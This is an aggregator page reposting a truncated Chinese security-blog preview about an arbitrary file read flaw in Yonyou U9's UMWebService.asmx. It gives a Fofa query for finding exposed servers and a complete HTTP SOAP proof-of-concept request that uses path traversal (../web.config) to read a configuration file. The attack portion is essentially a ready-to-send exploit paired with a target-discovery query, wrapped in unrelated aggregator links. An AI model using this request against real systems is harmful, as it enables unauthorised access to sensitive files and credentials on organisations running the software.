注册登录

专栏名称: Khan安全攻防实验室

安全不是一个人，我们来自五湖四海。研究方向Web内网渗透，免杀技术，红蓝攻防对抗，CTF。

我也要提交微信公众号

今天看啥

微信公众号rss订阅, 微信rss, 稳定的RSS源

微信公众号RSS订阅方法

B站投稿RSS订阅方法

微博RSS订阅方法

微博搜索关键词订阅方法

豆瓣日记 RSS订阅方法

目录

相关文章推荐

刀法研究所 · 美团小象超市启动出海；麦当劳中国前CFO加入 ... · 3 天前

龙船风电网 · 315MW！这家公司收购海上风电项目股份 · 3 天前

MINISO名创优品 · 在杭州！惊现蓝色名创门店，守护“小流浪”温暖过冬~ · 4 天前

今天看啥 › 专栏 › Khan安全攻防实验室

用友U9 UMWebService.asmx 任意文件读取

Khan安全攻防实验室 · 公众号 · · 2024-07-12 09:54

文章预览

用友U9多组织企业互联网应用平台UMWebService.asmx存在任意文件读取漏洞。攻击者可以通过发送特定的请求，利用该漏洞获取系统敏感文件。 Fofa 语法 body="logo-u9.png" 漏洞 POC POST /u9/OnLine/UMWebService.asmx HTTP/1.1 Host : your-ip User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Connection : close Content-Type : text/xml; charset=utf-8 Accept-Encoding : gzip Content-Length : 371 < soap:Envelope xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd = "http://www.w3.org/2001/XMLSchema" xmlns:soap = "http://schemas.xmlsoap.org/soap/envelope/" > < soap:Body > < GetLogContent xmlns = "http://tempuri.org/" > < fileName > ../web.config fileName > GetLogContent > soap:Body > soap:Envelope > ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

刀法研究所 · 美团小象超市启动出海；麦当劳中国前CFO加入霸王茶姬；瑞幸咖啡联名《乡村爱情》... | 刀法品牌热讯

3 天前

龙船风电网 · 315MW！这家公司收购海上风电项目股份

3 天前

MINISO名创优品 · 在杭州！惊现蓝色名创门店，守护“小流浪”温暖过冬~

4 天前

广发期货研究 · 双焦上涨了~

3 月前

莲妈读书 · 六小强全部启动，只为寻找这种人才

2 月前

中国基金报 · 把握国产大飞机机遇，这只A股宣布：定增！

2 月前

医药学术 · 以题代练 | 质谱谱图根据同位素模式判断所含元素

1 月前

智篆商业 · 2024淘系珠宝饰品趋势发布：三大核心品类、四大趋势风格

1 月前

关于移动版 · Py中国 · RSS之家 · CodingPro · Code · Link之家 · 卧龙AI搜索 · 小百科

今天看啥 - 微信公众号rss订阅, 微信rss, 稳定的RSS源

© 2024 ~ 沪ICP备11025650号